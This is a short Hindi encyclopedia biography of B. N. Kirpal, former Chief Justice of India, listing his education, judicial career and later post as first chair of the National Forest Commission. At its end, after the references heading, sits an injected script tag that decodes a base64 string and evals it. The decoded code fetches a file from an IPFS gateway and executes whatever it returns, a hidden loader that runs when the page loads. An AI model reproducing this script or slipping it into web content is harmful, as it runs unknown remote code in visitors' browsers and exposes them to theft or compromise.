भूपेंद्र नाथ कृपाल
भारत डिस्कवरी प्रस्तुति
रविन्द्र प्रसाद (चर्चा | योगदान) द्वारा परिवर्तित 12:02, 20 अगस्त 2022 का अवतरण (''''भूपेंद्र नाथ कृपाल''' (अंग्रेज़ी: ''Bhupinder Nath Kirpal'', जन्म- ...' के साथ नया पृष्ठ बनाया)
भूपेंद्र नाथ कृपाल (अंग्रेज़ी: Bhupinder Nath Kirpal, जन्म- 8 नवम्बर, 1937) भारत के 31वें भूतपूर्व मुख्य न्यायाधीश थे। उन्होंने 6 मई, 2002 से 7 नवंबर, 2002 को अपनी सेवानिवृत्ति तक मुख्य न्यायाधीश के पद सेवाएँ दीं।
- भूपेंद्र नाथ कृपाल का जन्म अविभाजित भारत के लाहौर में हुआ था, लेकिन विभाजन के बाद वे दिल्ली आ गए।
- उन्होंने अरुणा कृपाल विवाह किया। वह तीन संतानों के पिता हैं।
- वह द मॉडर्न स्कूल, नई दिल्ली और सेंट स्टीफेंस कॉलेज, दिल्ली विश्वविद्यालय के पूर्व छात्र रहे हैं।
- एक बेहतरीन क्रिकेट खिलाड़ी के रूप में उन्होंने अपने स्कूल और कॉलेज दोनों का प्रतिनिधित्व किया।
- सन 1962 में भूपेंद्र नाथ कृपाल ने एक वकील के रूप में अपना कानूनी कॅरियर शुरू किया।
- वह नवंबर 1979 में दिल्ली उच्च न्यायालय के न्यायाधीश नियुक्त किये गये।
- फिर दिसंबर 1993 में भूपेंद्र नाथ कृपाल को गुजरात उच्च न्यायालय का मुख्य न्यायाधीश नियुक्त किया गया।
- सितंबर 1995 में उन्हें भारत के सर्वोच्च न्यायालय का न्यायाधीश नियुक्त किया गया और 6 मई, 2002 में वह भारत के मुख्य न्यायाधीश बने।
- भारत के मुख्य न्यायाधीश के पद से सेवानिवृत्ति के बाद भूपेंद्र नाथ कृपाल को 21 फरवरी, 2003 को राष्ट्रीय वन आयोग का पहला अध्यक्ष नियुक्त किया गया।
|
|
|
|
|
टीका टिप्पणी और संदर्भ
संबंधित लेख
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>